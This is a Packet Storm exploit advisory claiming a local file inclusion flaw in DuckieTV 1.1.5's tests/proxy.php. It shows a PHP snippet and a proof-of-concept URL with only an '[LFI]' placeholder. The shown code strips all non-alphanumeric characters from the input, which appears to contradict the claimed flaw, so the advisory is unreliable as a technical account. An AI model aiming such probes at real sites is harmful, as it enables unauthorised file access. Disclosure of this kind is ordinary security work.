Lucene search

K
packetstormM.R.S.L.YPACKETSTORM:144612
HistoryOct 13, 2017 - 12:00 a.m.

DuckieTV CMS 1.1.5 Local File Inclusion

2017-10-1300:00:00
M.R.S.L.Y
packetstormsecurity.com
31

EPSS

0.042

Percentile

92.4%

` ___________________________________________________  
|  
| Exploit Title: DuckieTV CMS Local File Inclusion  
| Exploit Author: Ashiyane Digital security Team  
| Vendor Homepage: http://schizoduckie.github.io/DuckieTV/  
| Software Link:  
https://github.com/SchizoDuckie/DuckieTV/archive/angular.zip  
| Version: DuckieTV 1.1.5  
| Date: 2017-10-14  
| Category: webapps  
| Tested on: Kali-Linux /FireFox  
| CVE : CVE-2016-4314  
|__________________________________________________  
  
Vulnerable File :  
  
$cache = strtolower(preg_replace('/[^a-zA-Z0-9]/', '',  
$_GET['url'])).'.json';  
  
// if there's a cached version of this request in fixtures, serve it.  
if(file_exists(dirname(__FILE__).'/fixtures/'.$cache)) {  
$out =  
json_decode(file_get_contents(dirname(__FILE__).'/fixtures/'.$cache),true);  
$out['headers']['Content-Length'] = strlen($out['content']);  
unset($out['headers']['Transfer-Encoding']);  
unset($out['headers']['Cookie']);  
foreach($out['headers'] as $key=>$val) {  
header("{$key}: {$val}");  
}  
header('Proxy-Cache-hit: '.$cache);  
die($out['content']);  
} else {  
header('Proxy-Cache-miss: '.$cache);  
}  
  
Proof of Concept :  
  
http://127.0.0.1/7/DuckieTV-angular/tests/proxy.php?url=[LFI]  
  
__________________________________________________  
  
Discovered By : M.R.S.L.Y  
__________________________________________________  
`

EPSS

0.042

Percentile

92.4%